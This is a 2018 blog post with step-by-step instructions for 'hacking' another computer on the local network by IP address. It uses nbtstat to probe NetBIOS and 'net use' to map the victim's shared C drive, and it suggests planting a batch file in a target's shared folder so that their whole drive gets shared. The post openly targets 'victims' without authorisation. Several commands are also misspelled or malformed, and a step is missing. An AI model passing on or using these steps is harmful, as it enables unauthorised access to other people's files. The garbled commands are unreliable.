Saturday 1 September 2018

*Hack some other computer remotely using their IP address*

_Steps to Follow:_

*Step 1:*
Now Go to Star and click Run and then type as ```“CMD”``` and hit ```enter```.
command prompt will open.

*Step 2:*
Type in cmd as “```nbtstat -a IPaddressOfVictim```”  and hit enter.

(use ping command to know victim ipaddress)

For eg:

```nbstat -a 223.222.222.222```

If you see this your in NetBIOS Remote Machine Name Table

Name Type Status —————————————————————
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx
—————————————————————

If you don’t get the number <20>.
The victim disabled the File And Printer Sharing, find  another victim.

*Step 4:*
Now type as  “```net use x: \IPaddressOfVictimCDISK```” and hit enter>

replace with ip address of vitim in the place of  “IPaddressOfVictim.
You can give any letter instead of ‘x’.

For eg:
```net use x:\223.222.222.222CDISK```

*Step 5:*
Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive

Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:.

       
This hack will only work if you have the ip of someone on your network. It will not work if the ip of the person you want to “hack” is not on your network.
          If you can only access your targets shared folder put a batch file in their shared folder with the command C=C if they open it,it will share their hardrive.

Forward this post👉 https://t.me/joinchat/AAAAAFE03OMxGyqFdn5TRg

No comments:

Post a Comment

*Hack some other computer remotely using their IP address*

_Steps to Follow:_ *Step 1:* Now Go to Star and click Run and then type as ```“CMD”``` and hit ```enter```. command prompt will open. *S...